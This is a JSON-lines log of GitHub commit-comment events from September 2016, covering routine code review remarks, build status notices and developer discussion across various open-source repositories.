{"id":"4563552772","type":"CommitCommentEvent","actor":{"login":"gamerson"},"repo":{"name":"liferay/liferay-portal"},"payload":{"comment":{"id":19023792,"position":7,"line":8,"path":"modules/apps/screens/screens-service/bnd.bnd","commit_id":"609469e14751e86ec0ffddace7291ae8429e4cdd","created_at":"2016-09-14T17:54:41Z","updated_at":"2016-09-14T17:54:41Z","body":"Hey @nhpatt and @brianchandotcom  this ranges doesn't seem to make sense.   This ranges allows com.liferay.journal.* version 3.0.0 but it disallows versions that are semantically compatible like 3.0.1 and 3.1.0.  If we do want to support semantically compatible 3.x api then this should be\r\n`version=\"[1.0,4.0)\"`\r\nIf we don't want to support journal api 3.x then this should be changed to \r\n`version=\"[1.0,3.0)\"` "}},"created_at":"2016-09-14T17:54:41Z"}
{"id":"4563554601","type":"CommitCommentEvent","actor":{"login":"martinwiboe"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":19023797,"position":null,"line":null,"path":null,"commit_id":"3675c5c6a6a5b9f0c65106e7ab5b08358c5fc82a","created_at":"2016-09-14T17:55:02Z","updated_at":"2016-09-14T17:55:02Z","body":"@grendello I think it's a good and justified move to try and be as compatible with as many requests as possible. However, I see three problems with the UriBuilder approach:\r\n\r\n- it sometimes fails, as you rightly note with regards to ampersands. By hiding the lack of proper escaping in \"most\" cases, debugging is made harder\r\n- it breaks compatibility with the original httphandler interface, which does not do any processing of urls. `AndroidClientHandler` is supposed to be a drop-in replacement, which it can't be in this case\r\n- the original bug was due to `Uri.ToString()` breaking a correctly escaped Uri. It should be fixed by using `Uri.AbsoluteUri` instead, which does not alter the Uri.\r\n\r\nThanks for your consideration."}},"created_at":"2016-09-14T17:55:02Z"}
{"id":"4563556299","type":"CommitCommentEvent","actor":{"login":"txipi"},"repo":{"name":"txipi/Labclock-Web"},"payload":{"comment":{"id":19023801,"position":null,"line":null,"path":null,"commit_id":"1027d164218f353631667862ad973441d53f49cf","created_at":"2016-09-14T17:55:21Z","updated_at":"2016-09-14T17:55:21Z","body":"Thank you for catching this one! :)\r\n\r\nIndeed, comments are a little bit misleading because Google Chrome also implements document.all. Therefore, it gets the keyCode properly (that's why I did not see this bug :S)."}},"created_at":"2016-09-14T17:55:21Z"}
{"id":"4563556399","type":"CommitCommentEvent","actor":{"login":"KalamaresFTW"},"repo":{"name":"KalamaresFTW/AdvancedShitNStuff"},"payload":{"comment":{"id":19023803,"position":19,"line":19,"path":"src/helloworld/MadCalculations.java","commit_id":"2ed5708529e44f78539da00a1412af0078a1a95f","created_at":"2016-09-14T17:55:22Z","updated_at":"2016-09-14T17:55:22Z","body":"# **_ @ #drep_**"}},"created_at":"2016-09-14T17:55:22Z"}
{"id":"4563556908","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":19023804,"position":17,"line":13,"path":"sdlAdventures/Tetrimino.cpp","commit_id":"83952fec03afdc8564103e0ed320b9b32541c921","created_at":"2016-09-14T17:55:27Z","updated_at":"2016-09-14T17:55:27Z","body":"Donde están definidos m_position y m_currentFrame?"}},"created_at":"2016-09-14T17:55:27Z"}
{"id":"4563560975","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19023813,"position":null,"line":null,"path":null,"commit_id":"132c924f3a1fc7134ca13b9b410687a47f382f96","created_at":"2016-09-14T17:56:12Z","updated_at":"2016-09-14T17:56:12Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 30](http://teamcity.otenv.com/viewLog.html?buildId=5211816&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-14T17:56:12Z"}
{"id":"4563563162","type":"CommitCommentEvent","actor":{"login":"paulguy"},"repo":{"name":"CyanogenMod/android_device_oneplus_oneplus3"},"payload":{"comment":{"id":19023821,"position":null,"line":null,"path":null,"commit_id":"e2d9afc01043753bc7334bd492e572f87a7d7989","created_at":"2016-09-14T17:56:34Z","updated_at":"2016-09-14T17:56:34Z","body":"Does this mean this component is being closed-sourced?"}},"created_at":"2016-09-14T17:56:34Z"}
{"id":"4563564011","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":19023822,"position":17,"line":13,"path":"sdlAdventures/Tetrimino.cpp","commit_id":"83952fec03afdc8564103e0ed320b9b32541c921","created_at":"2016-09-14T17:56:44Z","updated_at":"2016-09-14T17:56:44Z","body":"No dije nada, están definidos en SDLGameObject :P"}},"created_at":"2016-09-14T17:56:44Z"}
{"id":"4563564239","type":"CommitCommentEvent","actor":{"login":"Nyks45"},"repo":{"name":"Nyks45/OctoDex-Kernel"},"payload":{"comment":{"id":19023823,"position":null,"line":null,"path":null,"commit_id":"bcdb9e8b49c03036b3f3c6627e5800f46d27a763","created_at":"2016-09-14T17:56:46Z","updated_at":"2016-09-14T17:56:46Z","body":"@eoghan2t9 this commit shows that the changes for zenfone 2 belongs to u \r\nare u happy now"}},"created_at":"2016-09-14T17:56:46Z"}
{"id":"4563567991","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19023836,"position":null,"line":null,"path":null,"commit_id":"132c924f3a1fc7134ca13b9b410687a47f382f96","created_at":"2016-09-14T17:57:26Z","updated_at":"2016-09-14T17:57:26Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 30](http://teamcity.otenv.com/viewLog.html?buildId=5211816&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 28 Build time: 00:01:13"}},"created_at":"2016-09-14T17:57:26Z"}
{"id":"4563569534","type":"CommitCommentEvent","actor":{"login":"acthp"},"repo":{"name":"ucscXena/ucsc-xena-client"},"payload":{"comment":{"id":19023843,"position":null,"line":null,"path":null,"commit_id":"f191db2e71052628dbdbec302b741af4f9b604f4","created_at":"2016-09-14T17:57:42Z","updated_at":"2016-09-14T17:57:42Z","body":"I believe there's a similar issue in the chart code, from the errors I've seen in some bookmarks, due to colUnit, and expUISetting. Also note that _.getIn will handle null/undefined values, so you can do\r\n\r\n```javascript\r\n_.getIn(column, ['datasetMetadata', 0, 'dataSubType'])\r\n```\r\n\r\nwhich will be column.datasetMetadata[0].dataSubtype, or undefined if any of the keys don't exist. You can also pass a default if you want something besides undefined, like\r\n\r\n```javascript\r\n_.getIn(column, ['datasetMetadata', 0, 'dataSubType'], 'clinical')\r\n```\r\n\r\n"}},"created_at":"2016-09-14T17:57:42Z"}
{"id":"4563576484","type":"CommitCommentEvent","actor":{"login":"silbermm"},"repo":{"name":"crdschurch/SS-CMS"},"payload":{"comment":{"id":19023870,"position":null,"line":null,"path":null,"commit_id":"6d5c25a0bb30beda63dacba484c74059fe3f2723","created_at":"2016-09-14T17:58:56Z","updated_at":"2016-09-14T17:58:56Z","body":"TeamCity Code :: 1. Development :: CMS :: Features [Build 43](http://mp-ci.centralus.cloudapp.azure.com/viewLog.html?buildId=8524&buildTypeId=Code_Development_Cms_Features&guest=1) is now running\n"}},"created_at":"2016-09-14T17:58:56Z"}
{"id":"4563579403","type":"CommitCommentEvent","actor":{"login":"talvo"},"repo":{"name":"pennmush/pennmush"},"payload":{"comment":{"id":19023880,"position":null,"line":null,"path":null,"commit_id":"be6afaf86b32a11ae05f8ce572e4581b5b1873b9","created_at":"2016-09-14T17:59:25Z","updated_at":"2016-09-14T17:59:25Z","body":"Yes, yes I am. Thank you!"}},"created_at":"2016-09-14T17:59:25Z"}
{"id":"4563580304","type":"CommitCommentEvent","actor":{"login":"sqwishy"},"repo":{"name":"sqwishy/vim-gdscript"},"payload":{"comment":{"id":19023885,"position":null,"line":null,"path":null,"commit_id":"657a9868628342f1cf9df101bfa2ec6ddcf04892","created_at":"2016-09-14T17:59:36Z","updated_at":"2016-09-14T17:59:36Z","body":"I just really don't like tabs.\r\n\r\nJust personal preference; no good reason."}},"created_at":"2016-09-14T17:59:36Z"}
{"id":"4563580371","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19023886,"position":null,"line":null,"path":null,"commit_id":"959128179ece6069beb1b43abf24a0961e6d1896","created_at":"2016-09-14T17:59:37Z","updated_at":"2016-09-14T17:59:37Z","body":"Seriously?"}},"created_at":"2016-09-14T17:59:37Z"}
{"id":"4563580534","type":"CommitCommentEvent","actor":{"login":"silbermm"},"repo":{"name":"crdschurch/SS-CMS"},"payload":{"comment":{"id":19023887,"position":null,"line":null,"path":null,"commit_id":"6d5c25a0bb30beda63dacba484c74059fe3f2723","created_at":"2016-09-14T17:59:38Z","updated_at":"2016-09-14T17:59:38Z","body":"TeamCity Code :: 1. Development :: CMS :: Features [Build 43](http://mp-ci.centralus.cloudapp.azure.com/viewLog.html?buildId=8524&buildTypeId=Code_Development_Cms_Features&guest=1) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:42"}},"created_at":"2016-09-14T17:59:38Z"}
{"id":"4563580867","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19023888,"position":null,"line":null,"path":null,"commit_id":"959128179ece6069beb1b43abf24a0961e6d1896","created_at":"2016-09-14T17:59:41Z","updated_at":"2016-09-14T17:59:41Z","body":"FIX IT!"}},"created_at":"2016-09-14T17:59:41Z"}
{"id":"4563583277","type":"CommitCommentEvent","actor":{"login":"copumpkin"},"repo":{"name":"NixOS/nix"},"payload":{"comment":{"id":19023896,"position":null,"line":null,"path":null,"commit_id":"90ad02bf626b885a5dd8967894e2eafc953bdf92","created_at":"2016-09-14T18:00:09Z","updated_at":"2016-09-14T18:00:09Z","body":"Nice!!"}},"created_at":"2016-09-14T18:00:09Z"}
{"id":"4563586972","type":"CommitCommentEvent","actor":{"login":"Adevade"},"repo":{"name":"anuko/timetracker"},"payload":{"comment":{"id":19023911,"position":null,"line":null,"path":null,"commit_id":"5aa92645bf876259fa327cf89a23df1f7034b1e3","created_at":"2016-09-14T18:00:42Z","updated_at":"2016-09-14T18:00:42Z","body":"In my local development environment this function always returns as if the file doesn't start with an opening tag, even though it does. \r\n\r\nI'm on Windows 10 with XAMPP and PHP v5.6.15.\r\n\r\nHowever, I've found three possible fixes for this and I will happily submit a PR once I know which solution is better.\r\n\r\n1. By changing line 64 to include the `trim()` function around the `$line` variable, and removing the `\\n` character from the first argument in `strcmp()`.\r\n2. By adding a `\\r` character before the `\\n`.\r\n3. Or by using the `PHP_EOL` constant in place of `\\r\\n`. \r\n\r\nAfter my [brief research](http://stackoverflow.com/a/6666554), I think I would go with the third option as it seems to work well with both DOS and *NIX systems."}},"created_at":"2016-09-14T18:00:42Z"}
{"id":"4563587186","type":"CommitCommentEvent","actor":{"login":"heukirne"},"repo":{"name":"alientronics/fleetany-web"},"payload":{"comment":{"id":19023912,"position":null,"line":null,"path":null,"commit_id":"9b1613275ae4d7728a3b8b9640eaf256f04bca43","created_at":"2016-09-14T18:00:43Z","updated_at":"2016-09-14T18:00:43Z","body":"migration, translate, seed, permission, entity, ficam no outro repositório"}},"created_at":"2016-09-14T18:00:43Z"}
{"id":"4563590145","type":"CommitCommentEvent","actor":{"login":"nigrosimone"},"repo":{"name":"todiadiyatmo/fix-w3tc"},"payload":{"comment":{"id":19023923,"position":null,"line":null,"path":null,"commit_id":"80b2f3d919412052055c1dbf6824d390448b5f2d","created_at":"2016-09-14T18:01:10Z","updated_at":"2016-09-14T18:01:10Z","body":"@todiadiyatmo please, can you publish a clean PR? this has so many modified line by white space. It's difficult understand what do you really change."}},"created_at":"2016-09-14T18:01:10Z"}
{"id":"4563593946","type":"CommitCommentEvent","actor":{"login":"bradcosine"},"repo":{"name":"newrelic/node-newrelic"},"payload":{"comment":{"id":19023944,"position":null,"line":null,"path":null,"commit_id":"01486debd760628f7eb83a13c7a92a9ec5352fdd","created_at":"2016-09-14T18:01:47Z","updated_at":"2016-09-14T18:01:47Z","body":"We were running into the same issue @olecrivain had. Reverting back to 1.30.1 fixed it."}},"created_at":"2016-09-14T18:01:47Z"}
{"id":"4563597979","type":"CommitCommentEvent","actor":{"login":"jmdatkin"},"repo":{"name":"stuy-softdev/workshop"},"payload":{"comment":{"id":19023955,"position":null,"line":null,"path":null,"commit_id":"5c355823b97b8efbc20caa6119b8c670f1b84ce1","created_at":"2016-09-14T18:02:29Z","updated_at":"2016-09-14T18:02:29Z","body":"oops"}},"created_at":"2016-09-14T18:02:29Z"}
{"id":"4563600443","type":"CommitCommentEvent","actor":{"login":"travi"},"repo":{"name":"newrelic/node-newrelic"},"payload":{"comment":{"id":19023972,"position":null,"line":null,"path":null,"commit_id":"01486debd760628f7eb83a13c7a92a9ec5352fdd","created_at":"2016-09-14T18:02:57Z","updated_at":"2016-09-14T18:02:57Z","body":"please don't unpublish versions. go ahead and mark them as deprecated, if necessary, but you should never need to unpublish. instead publish a new patch version that is a revert of the last version. unpublishing simply causes issues for others that have already updated.\r\n\r\nin my case, i use greenkeeper and get notified pretty quickly after a version is published, which is the only reason i was already consuming the new version. now that you've unpublished it, i get build failures for unrelated changes. if you had published a new version instead, i would have gotten another greenkeeper PR to pull in the update/revert rather than having a random build fail."}},"created_at":"2016-09-14T18:02:57Z"}
{"id":"4563601028","type":"CommitCommentEvent","actor":{"login":"tam-borine"},"repo":{"name":"glynester/learn_to_program"},"payload":{"comment":{"id":19023973,"position":null,"line":null,"path":null,"commit_id":"0eb9cc561122de6c0a0a7031c85d3a1a5cec8677","created_at":"2016-09-14T18:03:02Z","updated_at":"2016-09-14T18:03:02Z","body":"is it working now? I had this \r\nhttps://github.com/tam-borine/learn_to_program/blob/master/ch11-reading-and-writing/build_a_better_playlist.rb"}},"created_at":"2016-09-14T18:03:02Z"}
{"id":"4563604551","type":"CommitCommentEvent","actor":{"login":"Mojacko"},"repo":{"name":"HerculesWS/Hercules"},"payload":{"comment":{"id":19023978,"position":null,"line":null,"path":null,"commit_id":"4aa5286929b14ac52bef6959b295e189788e2578","created_at":"2016-09-14T18:03:40Z","updated_at":"2016-09-14T18:03:40Z","body":"Hi haru,\r\n\r\nIt is still not fixed in the latest version of herc as of (9/15/16)\r\nImage #1: http://imgur.com/a/E09kW\r\nImage #2: http://imgur.com/a/loFwN"}},"created_at":"2016-09-14T18:03:40Z"}
{"id":"4563607603","type":"CommitCommentEvent","actor":{"login":"matkuki"},"repo":{"name":"matkuki/ExCo"},"payload":{"comment":{"id":19023986,"position":null,"line":null,"path":null,"commit_id":"e9e9f116ecbe7f1df3e31d5efa25fc9879086d95","created_at":"2016-09-14T18:04:16Z","updated_at":"2016-09-14T18:04:16Z","body":"Fixes issues #4 and #5 "}},"created_at":"2016-09-14T18:04:16Z"}
{"id":"4563616871","type":"CommitCommentEvent","actor":{"login":"kwonn"},"repo":{"name":"sunset1215/rcs"},"payload":{"comment":{"id":19024008,"position":null,"line":null,"path":null,"commit_id":"8a6bb342c38a7c4b22a182d7feda3c136317f284","created_at":"2016-09-14T18:05:52Z","updated_at":"2016-09-14T18:05:52Z","body":"@sunset1215 ahh, I seem to have messed it up by putting my name at the beginning so that there were no conflicts. I think I understand what to do in the future though."}},"created_at":"2016-09-14T18:05:52Z"}
{"id":"4563617784","type":"CommitCommentEvent","actor":{"login":"rootfs"},"repo":{"name":"humblec/kubernetes"},"payload":{"comment":{"id":19024014,"position":27,"line":111,"path":"pkg/volume/glusterfs/glusterfs.go","commit_id":"fe6122b238358dc1704b302e2f44414294ee098d","created_at":"2016-09-14T18:06:02Z","updated_at":"2016-09-14T18:06:02Z","body":"user namepapce from volume.spec"}},"created_at":"2016-09-14T18:06:02Z"}
{"id":"4563620892","type":"CommitCommentEvent","actor":{"login":"rootfs"},"repo":{"name":"humblec/kubernetes"},"payload":{"comment":{"id":19024024,"position":62,"line":171,"path":"pkg/volume/glusterfs/glusterfs.go","commit_id":"fe6122b238358dc1704b302e2f44414294ee098d","created_at":"2016-09-14T18:06:38Z","updated_at":"2016-09-14T18:06:38Z","body":"remote this"}},"created_at":"2016-09-14T18:06:38Z"}
{"id":"4563622478","type":"CommitCommentEvent","actor":{"login":"allenh1"},"repo":{"name":"allenh1/YaSh"},"payload":{"comment":{"id":19024027,"position":null,"line":null,"path":null,"commit_id":"b40b3711d3d2aff5e7433f96723b28a5bf17763f","created_at":"2016-09-14T18:06:56Z","updated_at":"2016-09-14T18:06:56Z","body":"?\n\nOn Sep 14, 2016 12:19 PM, Samuel Mercier <notifications@github.com> wrote:\n\n?\n\n-\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub<https://github.com/allenh1/YaSh/commit/b40b3711d3d2aff5e7433f96723b28a5bf17763f#commitcomment-19021899>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AB63o9Q1lJndioqOF2WTQt0Zs9KqItAWks5qqB57gaJpZM4J89uM>.\n\n"}},"created_at":"2016-09-14T18:06:56Z"}
{"id":"4563625203","type":"CommitCommentEvent","actor":{"login":"Technikal25"},"repo":{"name":"Technikal25/index.html"},"payload":{"comment":{"id":19024038,"position":null,"line":null,"path":null,"commit_id":"6fcc663418336fac66c8f7eefd02ef82f1d9b006","created_at":"2016-09-14T18:07:26Z","updated_at":"2016-09-14T18:07:26Z","body":"![barn](https://cloud.githubusercontent.com/assets/22031817/18523980/c9449e50-7a73-11e6-9733-9e45d66313d3.png)\r\n"}},"created_at":"2016-09-14T18:07:26Z"}
{"id":"4563626959","type":"CommitCommentEvent","actor":{"login":"MartijnR"},"repo":{"name":"kobotoolbox/enketo-express"},"payload":{"comment":{"id":19024046,"position":5,"line":8,"path":"app/views/surveys/webform.jade","commit_id":"c842c0defa4f0279a2a2e7b3dd7aa38dfbaf5db1","created_at":"2016-09-14T18:07:46Z","updated_at":"2016-09-14T18:07:46Z","body":"This causes bug #547 for preview webform views"}},"created_at":"2016-09-14T18:07:46Z"}
{"id":"4563632477","type":"CommitCommentEvent","actor":{"login":"rxwei"},"repo":{"name":"dowobeha/mt-marathon-swift-c"},"payload":{"comment":{"id":19024065,"position":null,"line":null,"path":null,"commit_id":"13c50fc0685d7b699a36b67ad10d5f30b7db2a78","created_at":"2016-09-14T18:08:48Z","updated_at":"2016-09-14T18:08:48Z","body":"Might wanna make it a Swift package."}},"created_at":"2016-09-14T18:08:48Z"}
{"id":"4563632933","type":"CommitCommentEvent","actor":{"login":"lordloki"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":19024067,"position":8,"line":403,"path":"source/gameengine/Ketsji/KX_KetsjiEngine.cpp","commit_id":"85ddb546fbafca6d79967826ba50469d0ea01451","created_at":"2016-09-14T18:08:53Z","updated_at":"2016-09-14T18:08:53Z","body":"I think that if you want to iterate over all joysticks we need to declare a static variable in Dev_Joystick class to know which index is assigned to each joystick. This way was tested at begining of joystick refactor and it introduced more complexity than it was necessary.\r\n\r\nFor me, we can commit the clean up as it is."}},"created_at":"2016-09-14T18:08:53Z"}
{"id":"4563633893","type":"CommitCommentEvent","actor":{"login":"15peaces"},"repo":{"name":"rokimoki/LittleCP"},"payload":{"comment":{"id":19024068,"position":6,"line":16,"path":"modules/configuration.php","commit_id":"3ac0dda7c1c328bf37df84c3c3e2314d2c5d2888","created_at":"2016-09-14T18:09:05Z","updated_at":"2016-09-14T18:09:05Z","body":"Guess these changes here are made by mistake? =P"}},"created_at":"2016-09-14T18:09:05Z"}
{"id":"4563634056","type":"CommitCommentEvent","actor":{"login":"grendello"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":19024070,"position":null,"line":null,"path":null,"commit_id":"3675c5c6a6a5b9f0c65106e7ab5b08358c5fc82a","created_at":"2016-09-14T18:09:07Z","updated_at":"2016-09-14T18:09:07Z","body":"@martinwiboe Uri itself ignores erroneous ampersands, I think it's \"OK\" to leave this as-is. Compatibility with original HttpHandler is not possible in this case since Java.Net.URL which we must use doesn't do escaping, so we have no choice. Regarding `Uri.AbsoluteUri`, the result is the same:\r\n```\r\n20:03 $ csharp\r\nMono C# Shell, type \"help;\" for help\r\n\r\nEnter statements below.\r\ncsharp> var u = new Uri (\"http://example.com/?param1=test&hello&param2=test\");\r\ncsharp> u.ToString ();\r\n\"http://example.com/?param1=test&hello&param2=test\"\r\ncsharp> u.AbsoluteUri;\r\n\"http://example.com/?param1=test&hello&param2=test\"\r\ncsharp> var ub = new UriBuilder (\"http://example.com/?param1=test&hello&param2=test\") { Port = -1 }; \r\ncsharp> ub.ToString ();\r\n\"http://example.com/?param1=test&hello&param2=test\"\r\ncsharp>\r\n```\r\nAnd since PR has already been accepted and committed, we will stay with the UriBuilder code for now :) Thanks for the discussion guys!"}},"created_at":"2016-09-14T18:09:07Z"}
{"id":"4563634970","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19024072,"position":null,"line":null,"path":null,"commit_id":"10383f2cfe02114d0399ccb9fbe3ac338efc095b","created_at":"2016-09-14T18:09:17Z","updated_at":"2016-09-14T18:09:17Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-10383f2cfe02114d0399ccb9fbe3ac338efc095b-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-10383f2cfe02114d0399ccb9fbe3ac338efc095b-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T18:09:17Z"}
{"id":"4563636444","type":"CommitCommentEvent","actor":{"login":"pbyrne"},"repo":{"name":"sportngin/okcomputer"},"payload":{"comment":{"id":19024077,"position":15,"line":4,"path":"Gemfile","commit_id":"b279bc8a63aface08735e48145dc6c358a691131","created_at":"2016-09-14T18:09:32Z","updated_at":"2016-09-14T18:09:32Z","body":"I think we still want an extra \".0\" on the end here (or to put the extra portion in `.travis.yml` and other references to `ENV[\"RAILS_VERSION\"]`). We want \"5.0\" to mean \"5.0.x\", not \"5.x\"."}},"created_at":"2016-09-14T18:09:32Z"}
{"id":"4563636617","type":"CommitCommentEvent","actor":{"login":"ozyx"},"repo":{"name":"SaddlebackCSS/Git_Tutorial"},"payload":{"comment":{"id":19024079,"position":9,"line":9,"path":"RIDDLES.fun.txt","commit_id":"1dec17119e49db13238d1e623bd21daeacd5a7e3","created_at":"2016-09-14T18:09:34Z","updated_at":"2016-09-14T18:09:34Z","body":"```\r\nstd::map\r\n```"}},"created_at":"2016-09-14T18:09:34Z"}
{"id":"4563637614","type":"CommitCommentEvent","actor":{"login":"tamarrow"},"repo":{"name":"dcos/dcos-cli"},"payload":{"comment":{"id":19024080,"position":3,"line":83,"path":"tests/test_marathon.py","commit_id":"78d197cca5e2205ebc727a143e311e0895ac81b2","created_at":"2016-09-14T18:09:45Z","updated_at":"2016-09-14T18:09:45Z","body":"we can remove the 1 in this name now"}},"created_at":"2016-09-14T18:09:45Z"}
{"id":"4563637906","type":"CommitCommentEvent","actor":{"login":"brev"},"repo":{"name":"numenta/numenta-web"},"payload":{"comment":{"id":19024081,"position":null,"line":null,"path":null,"commit_id":"af719a854e2a51cb234100f613ea8156f41116b8","created_at":"2016-09-14T18:09:48Z","updated_at":"2016-09-14T18:09:48Z","body":"@jsfowles FYI I made this change but forgot to do a PR.\r\nUpdated npm packages, and fixed some warnings about lint rule updates.\r\nhttps://github.com/numenta/numenta-web/commit/af719a854e2a51cb234100f613ea8156f41116b8"}},"created_at":"2016-09-14T18:09:48Z"}
{"id":"4563638228","type":"CommitCommentEvent","actor":{"login":"rootfs"},"repo":{"name":"humblec/kubernetes"},"payload":{"comment":{"id":19024083,"position":27,"line":111,"path":"pkg/volume/glusterfs/glusterfs.go","commit_id":"fe6122b238358dc1704b302e2f44414294ee098d","created_at":"2016-09-14T18:09:51Z","updated_at":"2016-09-14T18:09:51Z","body":"if no endpointnamespace provided, go to use the pod's ns"}},"created_at":"2016-09-14T18:09:51Z"}
{"id":"4563639407","type":"CommitCommentEvent","actor":{"login":"ralphbean"},"repo":{"name":"mikem23/koji-playground"},"payload":{"comment":{"id":19024087,"position":null,"line":null,"path":null,"commit_id":"47542c7f6929c4c1e382e679acb443e6f399448f","created_at":"2016-09-14T18:10:04Z","updated_at":"2016-09-14T18:10:04Z","body":"I tested out a version of this code on our fedmsg plugin in Fedora's staging instance here:  https://pagure.io/releng/issue/109\r\n\r\nNo bugs found!"}},"created_at":"2016-09-14T18:10:04Z"}
{"id":"4563640614","type":"CommitCommentEvent","actor":{"login":"rootfs"},"repo":{"name":"humblec/kubernetes"},"payload":{"comment":{"id":19024092,"position":5,"line":677,"path":"pkg/api/types.go","commit_id":"fe6122b238358dc1704b302e2f44414294ee098d","created_at":"2016-09-14T18:10:19Z","updated_at":"2016-09-14T18:10:19Z","body":"since it is  optional, make it *string. "}},"created_at":"2016-09-14T18:10:19Z"}
{"id":"4563642214","type":"CommitCommentEvent","actor":{"login":"rootfs"},"repo":{"name":"humblec/kubernetes"},"payload":{"comment":{"id":19024095,"position":5,"line":561,"path":"pkg/api/v1/types.go","commit_id":"fe6122b238358dc1704b302e2f44414294ee098d","created_at":"2016-09-14T18:10:34Z","updated_at":"2016-09-14T18:10:34Z","body":"ditto"}},"created_at":"2016-09-14T18:10:34Z"}
{"id":"4563645722","type":"CommitCommentEvent","actor":{"login":"rootfs"},"repo":{"name":"humblec/kubernetes"},"payload":{"comment":{"id":19024102,"position":219,"line":527,"path":"pkg/volume/glusterfs/glusterfs.go","commit_id":"fe6122b238358dc1704b302e2f44414294ee098d","created_at":"2016-09-14T18:11:15Z","updated_at":"2016-09-14T18:11:15Z","body":"call similar function to delete them in deleter"}},"created_at":"2016-09-14T18:11:15Z"}
{"id":"4563647402","type":"CommitCommentEvent","actor":{"login":"r1b"},"repo":{"name":"computer-lab/django-rest-framework-roles"},"payload":{"comment":{"id":19024109,"position":null,"line":null,"path":null,"commit_id":"08774d48b613b3339bcd8566f65a6fe7f10dec10","created_at":"2016-09-14T18:11:34Z","updated_at":"2016-09-14T18:11:34Z","body":"Closes #2 "}},"created_at":"2016-09-14T18:11:34Z"}
{"id":"4563648534","type":"CommitCommentEvent","actor":{"login":"esoergel"},"repo":{"name":"dimagi/commcare-hq"},"payload":{"comment":{"id":19024114,"position":7,"line":14,"path":"corehq/apps/locations/const.py","commit_id":"9581d08f22b8645503a287256970252b39206e0f","created_at":"2016-09-14T18:11:47Z","updated_at":"2016-09-14T18:11:47Z","body":"Awesome, that'd be great, thanks!"}},"created_at":"2016-09-14T18:11:47Z"}
{"id":"4563653762","type":"CommitCommentEvent","actor":{"login":"JescaLyn"},"repo":{"name":"JescaLyn/JescaLyn.github.io"},"payload":{"comment":{"id":19024128,"position":null,"line":null,"path":null,"commit_id":"6d7da2d08068839eda762e6a3bd7726aa2355883","created_at":"2016-09-14T18:12:47Z","updated_at":"2016-09-14T18:12:47Z","body":"CNAME not working"}},"created_at":"2016-09-14T18:12:47Z"}
{"id":"4563655048","type":"CommitCommentEvent","actor":{"login":"chrisarcand"},"repo":{"name":"sportngin/okcomputer"},"payload":{"comment":{"id":19024130,"position":15,"line":4,"path":"Gemfile","commit_id":"b279bc8a63aface08735e48145dc6c358a691131","created_at":"2016-09-14T18:13:01Z","updated_at":"2016-09-14T18:13:01Z","body":"Oh oops, right on."}},"created_at":"2016-09-14T18:13:01Z"}
{"id":"4563659999","type":"CommitCommentEvent","actor":{"login":"Aster89"},"repo":{"name":"sqwishy/vim-gdscript"},"payload":{"comment":{"id":19024144,"position":null,"line":null,"path":null,"commit_id":"657a9868628342f1cf9df101bfa2ec6ddcf04892","created_at":"2016-09-14T18:13:56Z","updated_at":"2016-09-14T18:13:56Z","body":"Neither do I, personally, but Godot gives error if tabs are substituted with spaces.\r\n"}},"created_at":"2016-09-14T18:13:56Z"}
{"id":"4563661456","type":"CommitCommentEvent","actor":{"login":"fantuz"},"repo":{"name":"jech/polipo"},"payload":{"comment":{"id":19024154,"position":null,"line":null,"path":null,"commit_id":"ab52932c20638491f696e256020ad6a20aad7939","created_at":"2016-09-14T18:14:14Z","updated_at":"2016-09-14T18:14:14Z","body":"I loved Polipo, as much that I wrote a DNS proxy on top of its robust and fast replies.\r\nhttps://github.com/fantuz/DNSProxy\r\n\r\nI would be willing to adapt it to HTTP2 or multipath-tcp... one day.\r\n\r\nThanks @jech "}},"created_at":"2016-09-14T18:14:14Z"}
